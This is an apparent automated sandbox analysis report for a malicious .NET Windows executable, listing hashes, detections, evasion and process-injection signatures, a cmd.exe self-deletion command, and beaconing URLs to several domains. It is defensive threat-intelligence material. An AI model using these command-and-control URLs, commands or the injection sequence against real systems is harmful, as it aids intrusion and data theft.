File details Download PDF Report | |
---|---|
File type: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
File size: | 927.50 KB (949760 bytes) |
Compile time: | 2018-11-06 12:30:04 |
MD5: | cf4e557fae0400be25950605b6b166a2 |
SHA1: | 4bfb39c6e8e766903163f087bc7f83bd1a99f637 |
SHA256: | f323201612174c46f18aeefce83d1491fe17f3504cdb87ddc6ef7c58ed65226d |
Import hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Sections 3 | .text .rsrc .reloc |
Directories 4 | import resource debug relocation |
First submission: | 2018-11-08 12:15:05 |
Last submission: | 2018-11-08 12:15:05 |
Filename detected: |
- 1.exe (1) |
URL file hosting |
---|
hXXps://nstpictures.com.ph/images/icons/1/1.exe![]() |
Antivirus Report | |||
---|---|---|---|
Report Date | Detection Ratio | Permalink | Update |
2018-11-07 00:03:46 | [22/67] | ![]() |
PE Sections 1 suspicious | |||||
---|---|---|---|---|---|
Name | VAddress | VSize | Size | MD5 | SHA1 |
.text | 0x2000 | 0x8d944 | 580096 | 62d424242194cfa6ec187d135d5b6e5a | 6d500d317cea4f5a47a7b87c8f6ed5a3ed3773c1 |
.rsrc | 0x90000 | 0x27e5c | 163840 | 46793e4b898713118cca1ac46336b898 | 265e2e1a9b605d6b9afd2524da3cd6d1bd2d2f48 |
.reloc | 0xb8000 | 0xc | 512 | 588754ad0a87cf27bfe8704b207759a6 | e956a50f203284ce1334d713a040dc110bd7a0cc |
Meta Info | |
---|---|
No Meta found in this file |
XOR | |
---|---|
No XOR informations found in this file. |
Signature | |
---|---|
This file isn't digitally signed |
Packer(s) | |
---|---|
Microsoft Visual C# / Basic .NET | |
Microsoft Visual Studio .NET | |
.NET executable | |
Microsoft Visual C# v7.0 / Basic .NET |
File found | |
---|---|
FIle type: Library | |
mscoree.dll |
IP Found | |
---|---|
No IP detected |
URL(s) | |
---|---|
No URL found |
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven01b_64 | Seven01b_64 | VirtualBox | 2018-11-08 12:07:09 | 2018-11-08 12:10:33 | 204 |
18 Behaviors detected by system signatures
Uses suspicious command line tools or Windows utilities
Severity: High
Confidence: High
- command: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
Created network traffic indicative of malicious activity
Severity: High
Confidence: High
- signature:
- signature: Traffico Anomalo: Traffico verso host malevolo, GET HTTP Content "db" (Soc-Rule)
Anomalous binary characteristics
Severity: High
Confidence: High
- anomaly: Actual checksum does not match that reported in PE header
Checks the system manufacturer, likely for anti-virtualization
Severity: High
Confidence: Very High
Attempts to repeatedly call a single API many times in order to delay analysis time
Severity: High
Confidence: Very High
- Spam: services.exe (476) called API GetSystemTimeAsFileTime 2319118 times
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: 1.exe(2724) -> vbc.exe(3036)
Uses Windows utilities for basic functionality
Severity: Medium
Confidence: High
- command: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
Anomalous .NET characteristics
Severity: Medium
Confidence: Very High
- anomalous_version: Assembly version is set to 0
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://www.glowsole.com/ca/?8pgTVpAp=kA6gmZ5EWLoc3k3LepBIjgUX/v60aq6scZPph6z89XUxJ6XCAsys1W5b+p4aSJBn2pC8+Pgm&Bj=lHU80vox_T4h
- url: http://www.classicrockandgems.com/ca/?8pgTVpAp=mCOHzPdu+fAGyzf1IeqFEZ+iBma2k3gF8M3pIM6w8KkZAJQpYbIqp1d8U9j4Hw7I07TASQAS&Bj=lHU80vox_T4h
- url: http://www.classicrockandgems.com/ca/
- url: http://www.spoiledheart.com/ca/?8pgTVpAp=3qiCbzHjUKrx5316i0hNMiDY24i5CSmBAhzJOumdUxAosQrDJicuf8DALk31WhWtOjX/d2E1&Bj=lHU80vox_T4h
- url: http://www.spoiledheart.com/ca/
- url: http://www.367vision.com/ca/?8pgTVpAp=qje6eop49qX+GGoPGoorvc415RPYGJiQbBRMscic/vwCUvhv1kHn9liljdiNV+DId7TFJDBe&Bj=lHU80vox_T4h
- url: http://www.367vision.com/ca/
- url: http://www.jcygtpu.com/ca/?8pgTVpAp=o3AtFaTs1rmGXcR0wgItQmgbfTY+urSXwC3w6Z/iYvvKaJ7Bo/+NxMYDAwHpQL/BoezhCD4D&Bj=lHU80vox_T4h
- url: http://www.jcygtpu.com/ca/
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
- suspicious_request: http://www.glowsole.com/ca/?8pgTVpAp=kA6gmZ5EWLoc3k3LepBIjgUX/v60aq6scZPph6z89XUxJ6XCAsys1W5b+p4aSJBn2pC8+Pgm&Bj=lHU80vox_T4h
- suspicious_request: http://www.classicrockandgems.com/ca/?8pgTVpAp=mCOHzPdu+fAGyzf1IeqFEZ+iBma2k3gF8M3pIM6w8KkZAJQpYbIqp1d8U9j4Hw7I07TASQAS&Bj=lHU80vox_T4h
- suspicious_request: http://www.classicrockandgems.com/ca/
- suspicious_request: http://www.spoiledheart.com/ca/?8pgTVpAp=3qiCbzHjUKrx5316i0hNMiDY24i5CSmBAhzJOumdUxAosQrDJicuf8DALk31WhWtOjX/d2E1&Bj=lHU80vox_T4h
- suspicious_request: http://www.spoiledheart.com/ca/
- suspicious_request: http://www.367vision.com/ca/?8pgTVpAp=qje6eop49qX+GGoPGoorvc415RPYGJiQbBRMscic/vwCUvhv1kHn9liljdiNV+DId7TFJDBe&Bj=lHU80vox_T4h
- suspicious_request: http://www.367vision.com/ca/
- suspicious_request: http://www.jcygtpu.com/ca/?8pgTVpAp=o3AtFaTs1rmGXcR0wgItQmgbfTY+urSXwC3w6Z/iYvvKaJ7Bo/+NxMYDAwHpQL/BoezhCD4D&Bj=lHU80vox_T4h
- suspicious_request: http://www.jcygtpu.com/ca/
A process created a hidden window
Severity: Medium
Confidence: Very High
- Process: wlanext.exe -> C:\Windows\SysWOW64\cmd.exe
Network activity detected but not expressed in API logs
Severity: Medium
Confidence: Very High
Dynamic (imported) function loading detected
Severity: Medium
Confidence: Very High
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
- DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
- DynamicLoader: ADVAPI32.dll/RegEnumValueW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
- DynamicLoader: KERNEL32.dll/CreateEventExW
- DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
- DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
- DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
- DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
- DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
- DynamicLoader: KERNEL32.dll/SetThreadpoolWait
- DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
- DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
- DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
- DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
- DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
- DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
- DynamicLoader: KERNEL32.dll/CompareStringEx
- DynamicLoader: KERNEL32.dll/GetDateFormatEx
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/GetTimeFormatEx
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/IsValidLocaleName
- DynamicLoader: KERNEL32.dll/LCMapStringEx
- DynamicLoader: KERNEL32.dll/GetCurrentPackageId
- DynamicLoader: KERNEL32.dll/GetTickCount64
- DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
- DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
- DynamicLoader: ADVAPI32.dll/EventRegister
- DynamicLoader: ADVAPI32.dll/EventSetInformation
- DynamicLoader: MSCOREE.DLL/
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryValueExW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: mscoreei.dll/RegisterShimImplCallback
- DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
- DynamicLoader: mscoreei.dll/SetShellShimInstance
- DynamicLoader: mscoreei.dll/OnShimDllMainCalled
- DynamicLoader: mscoreei.dll/_CorExeMain_RetAddr
- DynamicLoader: mscoreei.dll/_CorExeMain
- DynamicLoader: SHLWAPI.dll/UrlIsW
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
- DynamicLoader: VERSION.dll/GetFileVersionInfoW
- DynamicLoader: VERSION.dll/VerQueryValueW
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
- DynamicLoader: KERNEL32.dll/CreateEventExW
- DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
- DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
- DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
- DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
- DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
- DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
- DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
- DynamicLoader: KERNEL32.dll/SetThreadpoolWait
- DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
- DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
- DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
- DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
- DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
- DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
- DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
- DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
- DynamicLoader: KERNEL32.dll/CompareStringEx
- DynamicLoader: KERNEL32.dll/GetDateFormatEx
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/GetTimeFormatEx
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/IsValidLocaleName
- DynamicLoader: KERNEL32.dll/LCMapStringEx
- DynamicLoader: KERNEL32.dll/GetCurrentPackageId
- DynamicLoader: KERNEL32.dll/GetTickCount64
- DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
- DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
- DynamicLoader: ADVAPI32.dll/EventSetInformation
- DynamicLoader: clr.dll/SetRuntimeInfo
- DynamicLoader: clr.dll/_CorExeMain
- DynamicLoader: MSCOREE.DLL/CreateConfigStream
- DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
- DynamicLoader: mscoreei.dll/CreateConfigStream
- DynamicLoader: KERNEL32.dll/GetNumaHighestNodeNumber
- DynamicLoader: KERNEL32.dll/FlsSetValue
- DynamicLoader: KERNEL32.dll/FlsGetValue
- DynamicLoader: KERNEL32.dll/FlsAlloc
- DynamicLoader: KERNEL32.dll/FlsFree
- DynamicLoader: KERNEL32.dll/GetSystemWindowsDirectoryW
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: KERNEL32.dll/AddSIDToBoundaryDescriptor
- DynamicLoader: KERNEL32.dll/CreateBoundaryDescriptorW
- DynamicLoader: KERNEL32.dll/CreatePrivateNamespaceW
- DynamicLoader: KERNEL32.dll/OpenPrivateNamespaceW
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/GetTokenInformation
- DynamicLoader: ADVAPI32.dll/InitializeAcl
- DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: KERNEL32.dll/DeleteBoundaryDescriptor
- DynamicLoader: KERNEL32.dll/WerRegisterRuntimeExceptionModule
- DynamicLoader: KERNEL32.dll/RaiseException
- DynamicLoader: MSCOREE.DLL/
- DynamicLoader: mscoreei.dll/
- DynamicLoader: KERNELBASE.dll/SetSystemFileCacheSize
- DynamicLoader: ntdll.dll/NtSetSystemInformation
- DynamicLoader: KERNELBASE.dll/PrivIsDllSynchronizationHeld
- DynamicLoader: KERNEL32.dll/AddDllDirectory
- DynamicLoader: KERNEL32.dll/SortGetHandle
- DynamicLoader: KERNEL32.dll/SortCloseHandle
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: clrjit.dll/sxsJitStartup
- DynamicLoader: clrjit.dll/getJit
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/ReleaseMutex
- DynamicLoader: KERNEL32.dll/CreateMutex
- DynamicLoader: KERNEL32.dll/CreateMutexW
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
- DynamicLoader: KERNEL32.dll/LocaleNameToLCID
- DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
- DynamicLoader: KERNEL32.dll/LCIDToLocaleName
- DynamicLoader: KERNEL32.dll/GetUserPreferredUILanguages
- DynamicLoader: shell32.dll/SHGetFolderPath
- DynamicLoader: shell32.dll/SHGetFolderPathW
- DynamicLoader: ole32.dll/CoTaskMemAlloc
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: KERNEL32.dll/GetFullPathName
- DynamicLoader: KERNEL32.dll/GetFullPathNameW
- DynamicLoader: MSCOREE.DLL/GetProcessExecutableHeap
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
- DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
- DynamicLoader: KERNEL32.dll/SetThreadErrorMode
- DynamicLoader: KERNEL32.dll/GetFileAttributesEx
- DynamicLoader: KERNEL32.dll/GetFileAttributesExW
- DynamicLoader: ADVAPI32.dll/EventRegister
- DynamicLoader: KERNEL32.dll/CompareStringOrdinal
- DynamicLoader: clr.dll/CreateAssemblyNameObject
- DynamicLoader: clr.dll/CreateAssemblyNameObjectW
- DynamicLoader: ole32.dll/CoGetContextToken
- DynamicLoader: ole32.dll/CoGetObjectContext
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
- DynamicLoader: CRYPTSP.dll/CryptGenRandom
- DynamicLoader: ole32.dll/NdrOleInitializeExtension
- DynamicLoader: ole32.dll/CoGetClassObject
- DynamicLoader: ole32.dll/CoGetMarshalSizeMax
- DynamicLoader: ole32.dll/CoMarshalInterface
- DynamicLoader: ole32.dll/CoUnmarshalInterface
- DynamicLoader: ole32.dll/StringFromIID
- DynamicLoader: ole32.dll/CoGetPSClsid
- DynamicLoader: ole32.dll/CoTaskMemAlloc
- DynamicLoader: ole32.dll/CoTaskMemFree
- DynamicLoader: ole32.dll/CoCreateInstance
- DynamicLoader: ole32.dll/CoReleaseMarshalData
- DynamicLoader: ole32.dll/DcomChannelSetHResult
- DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
- DynamicLoader: clr.dll/CreateAssemblyEnum
- DynamicLoader: clr.dll/CreateAssemblyEnumW
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/ResolveLocaleName
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/GetNativeSystemInfo
- DynamicLoader: KERNEL32.dll/LoadLibraryA
- DynamicLoader: KERNEL32.dll/WideCharToMultiByte
- DynamicLoader: KERNEL32.dll/GetProcAddress
- DynamicLoader: KERNEL32.dll/GetModuleHandleA
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
- DynamicLoader: KERNEL32.dll/GetCurrentProcess
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: ntdll.dll/NtQuerySystemInformation
- DynamicLoader: ntdll.dll/NtQuerySystemInformationW
- DynamicLoader: KERNEL32.dll/CreateProcessA
- DynamicLoader: KERNEL32.dll/GetThreadContext
- DynamicLoader: KERNEL32.dll/Wow64GetThreadContext
- DynamicLoader: KERNEL32.dll/SetThreadContext
- DynamicLoader: KERNEL32.dll/Wow64SetThreadContext
- DynamicLoader: KERNEL32.dll/ReadProcessMemory
- DynamicLoader: KERNEL32.dll/WriteProcessMemory
- DynamicLoader: ntdll.dll/NtUnmapViewOfSection
- DynamicLoader: KERNEL32.dll/VirtualAllocEx
- DynamicLoader: KERNEL32.dll/ResumeThread
- DynamicLoader: ADVAPI32.dll/EventUnregister
- DynamicLoader: ole32.dll/CoUninitialize
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: KERNEL32.dll/CreateActCtxW
- DynamicLoader: KERNEL32.dll/AddRefActCtx
- DynamicLoader: KERNEL32.dll/ReleaseActCtx
- DynamicLoader: KERNEL32.dll/ActivateActCtx
- DynamicLoader: KERNEL32.dll/DeactivateActCtx
- DynamicLoader: KERNEL32.dll/GetCurrentActCtx
- DynamicLoader: KERNEL32.dll/QueryActCtxW
- DynamicLoader: CRYPTSP.dll/CryptReleaseContext
- DynamicLoader: ADVAPI32.dll/EventUnregister
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: uxtheme.dll/ThemeInitApiHook
- DynamicLoader: USER32.dll/IsProcessDPIAware
- DynamicLoader: MLANG.dll/
- DynamicLoader: WININET.dll/FindFirstUrlCacheEntryA
- DynamicLoader: kernel32.dll/SetFileInformationByHandle
- DynamicLoader: SHELL32.dll/SHGetFolderPathW
- DynamicLoader: urlmon.dll/CreateUri
- DynamicLoader: kernel32.dll/InitializeSRWLock
- DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
- DynamicLoader: kernel32.dll/AcquireSRWLockShared
- DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
- DynamicLoader: kernel32.dll/ReleaseSRWLockShared
- DynamicLoader: kernel32.dll/InitializeSRWLock
- DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
- DynamicLoader: kernel32.dll/AcquireSRWLockShared
- DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
- DynamicLoader: kernel32.dll/ReleaseSRWLockShared
- DynamicLoader: WININET.dll/FindNextUrlCacheEntryA
- DynamicLoader: WININET.dll/FindCloseUrlCache
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
- DynamicLoader: USER32.dll/GetWindowInfo
- DynamicLoader: USER32.dll/GetAncestor
- DynamicLoader: USER32.dll/GetMonitorInfoA
- DynamicLoader: USER32.dll/EnumDisplayMonitors
- DynamicLoader: USER32.dll/EnumDisplayDevicesA
- DynamicLoader: GDI32.dll/ExtTextOutW
- DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
- DynamicLoader: WindowsCodecs.dll/DllGetClassObject
- DynamicLoader: kernel32.dll/WerRegisterMemoryBlock
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: OLEAUT32.dll/
- DynamicLoader: kernel32.dll/SetThreadUILanguage
- DynamicLoader: kernel32.dll/CopyFileExW
- DynamicLoader: kernel32.dll/IsDebuggerPresent
- DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: uxtheme.dll/ThemeInitApiHook
- DynamicLoader: USER32.dll/IsProcessDPIAware
- DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled
- DynamicLoader: RPCRT4.dll/UuidFromStringW
- DynamicLoader: radarrs.dll/WdiDiagnosticModuleMain
- DynamicLoader: radarrs.dll/WdiHandleInstance
- DynamicLoader: radarrs.dll/WdiGetDiagnosticModuleInterfaceVersion
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: kernel32.dll/SortGetHandle
- DynamicLoader: kernel32.dll/SortCloseHandle
- DynamicLoader: wersvc.dll/ServiceMain
- DynamicLoader: wersvc.dll/SvchostPushServiceGlobals
- DynamicLoader: ADVAPI32.dll/RegGetValueW
- DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
- DynamicLoader: faultrep.dll/WerpInitiateCrashReporting
- DynamicLoader: wer.dll/WerpCreateMachineStore
- DynamicLoader: SHELL32.dll/SHGetFolderPathEx
- DynamicLoader: ole32.dll/StringFromGUID2
- DynamicLoader: profapi.dll/
- DynamicLoader: USERENV.dll/CreateEnvironmentBlock
- DynamicLoader: sechost.dll/ConvertSidToStringSidW
- DynamicLoader: SspiCli.dll/GetUserNameExW
- DynamicLoader: USERENV.dll/DestroyEnvironmentBlock
- DynamicLoader: wer.dll/WerpSvcReportFromMachineQueue
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/DuplicateToken
- DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
- DynamicLoader: ADVAPI32.dll/CheckTokenMembership
- DynamicLoader: ADVAPI32.dll/FreeSid
- DynamicLoader: WTSAPI32.dll/WTSQueryUserToken
- DynamicLoader: WINSTA.dll/WinStationQueryInformationW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: ADVAPI32.dll/CreateWellKnownSid
- DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
- DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
- DynamicLoader: RPCRT4.dll/RpcStringFreeW
- DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: RPCRT4.dll/NdrClientCall3
- DynamicLoader: RPCRT4.dll/RpcBindingFree
- DynamicLoader: ADVAPI32.dll/ImpersonateLoggedOnUser
- DynamicLoader: ADVAPI32.dll/CreateProcessAsUserW
- DynamicLoader: IMM32.dll/ImmDisableIME
- DynamicLoader: psapi.dll/GetModuleFileNameExW
- DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
- DynamicLoader: VERSION.dll/GetFileVersionInfoW
- DynamicLoader: VERSION.dll/VerQueryValueW
- DynamicLoader: kernel32.dll/SortGetHandle
- DynamicLoader: kernel32.dll/SortCloseHandle
- DynamicLoader: wer.dll/WerpCreateIntegratorReportId
- DynamicLoader: wer.dll/WerReportCreate
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: wer.dll/WerpSetIntegratorReportId
- DynamicLoader: wer.dll/WerReportSetParameter
- DynamicLoader: dbgeng.dll/DebugCreate
- DynamicLoader: ntdll.dll/CsrGetProcessId
- DynamicLoader: ntdll.dll/DbgBreakPoint
- DynamicLoader: ntdll.dll/DbgPrint
- DynamicLoader: ntdll.dll/DbgPrompt
- DynamicLoader: ntdll.dll/DbgUiConvertStateChangeStructure
- DynamicLoader: ntdll.dll/DbgUiGetThreadDebugObject
- DynamicLoader: ntdll.dll/DbgUiIssueRemoteBreakin
- DynamicLoader: ntdll.dll/DbgUiSetThreadDebugObject
- DynamicLoader: ntdll.dll/NtAllocateVirtualMemory
- DynamicLoader: ntdll.dll/NtClose
- DynamicLoader: ntdll.dll/NtCreateDebugObject
- DynamicLoader: ntdll.dll/NtCreateFile
- DynamicLoader: ntdll.dll/NtDebugActiveProcess
- DynamicLoader: ntdll.dll/NtDebugContinue
- DynamicLoader: ntdll.dll/NtFreeVirtualMemory
- DynamicLoader: ntdll.dll/NtOpenProcess
- DynamicLoader: ntdll.dll/NtOpenThread
- DynamicLoader: ntdll.dll/NtQueryInformationProcess
- DynamicLoader: ntdll.dll/NtQueryInformationThread
- DynamicLoader: ntdll.dll/NtQueryMutant
- DynamicLoader: ntdll.dll/NtQueryObject
- DynamicLoader: ntdll.dll/NtQuerySystemInformation
- DynamicLoader: ntdll.dll/NtRemoveProcessDebug
- DynamicLoader: ntdll.dll/NtResumeThread
- DynamicLoader: ntdll.dll/NtSetInformationDebugObject
- DynamicLoader: ntdll.dll/NtSetInformationProcess
- DynamicLoader: ntdll.dll/NtSystemDebugControl
- DynamicLoader: ntdll.dll/NtWaitForDebugEvent
- DynamicLoader: ntdll.dll/RtlAnsiStringToUnicodeString
- DynamicLoader: ntdll.dll/RtlCreateProcessParameters
- DynamicLoader: ntdll.dll/RtlCreateUserProcess
- DynamicLoader: ntdll.dll/RtlDestroyProcessParameters
- DynamicLoader: ntdll.dll/RtlDosPathNameToNtPathName_U
- DynamicLoader: ntdll.dll/RtlFindMessage
- DynamicLoader: ntdll.dll/RtlFreeHeap
- DynamicLoader: ntdll.dll/RtlFreeUnicodeString
- DynamicLoader: ntdll.dll/RtlGetFunctionTableListHead
- DynamicLoader: ntdll.dll/RtlGetUnloadEventTrace
- DynamicLoader: ntdll.dll/RtlGetUnloadEventTraceEx
- DynamicLoader: ntdll.dll/RtlInitAnsiString
- DynamicLoader: ntdll.dll/RtlInitUnicodeString
- DynamicLoader: ntdll.dll/RtlTryEnterCriticalSection
- DynamicLoader: ntdll.dll/RtlUnicodeStringToAnsiString
- DynamicLoader: ntdll.dll/NtOpenProcessToken
- DynamicLoader: ntdll.dll/NtOpenThreadToken
- DynamicLoader: ntdll.dll/NtQueryInformationToken
- DynamicLoader: kernel32.dll/CloseProfileUserMapping
- DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
- DynamicLoader: kernel32.dll/DebugActiveProcessStop
- DynamicLoader: kernel32.dll/DebugBreak
- DynamicLoader: kernel32.dll/DebugBreakProcess
- DynamicLoader: kernel32.dll/DebugSetProcessKillOnExit
- DynamicLoader: kernel32.dll/Module32First
- DynamicLoader: kernel32.dll/Module32FirstW
- DynamicLoader: kernel32.dll/Module32Next
- DynamicLoader: kernel32.dll/Module32NextW
- DynamicLoader: kernel32.dll/OpenThread
- DynamicLoader: kernel32.dll/Process32First
- DynamicLoader: kernel32.dll/Process32FirstW
- DynamicLoader: kernel32.dll/Process32Next
- DynamicLoader: kernel32.dll/Process32NextW
- DynamicLoader: kernel32.dll/ProcessIdToSessionId
- DynamicLoader: kernel32.dll/SetProcessShutdownParameters
- DynamicLoader: kernel32.dll/Thread32First
- DynamicLoader: kernel32.dll/Thread32Next
- DynamicLoader: kernel32.dll/GetTimeZoneInformation
- DynamicLoader: kernel32.dll/DuplicateHandle
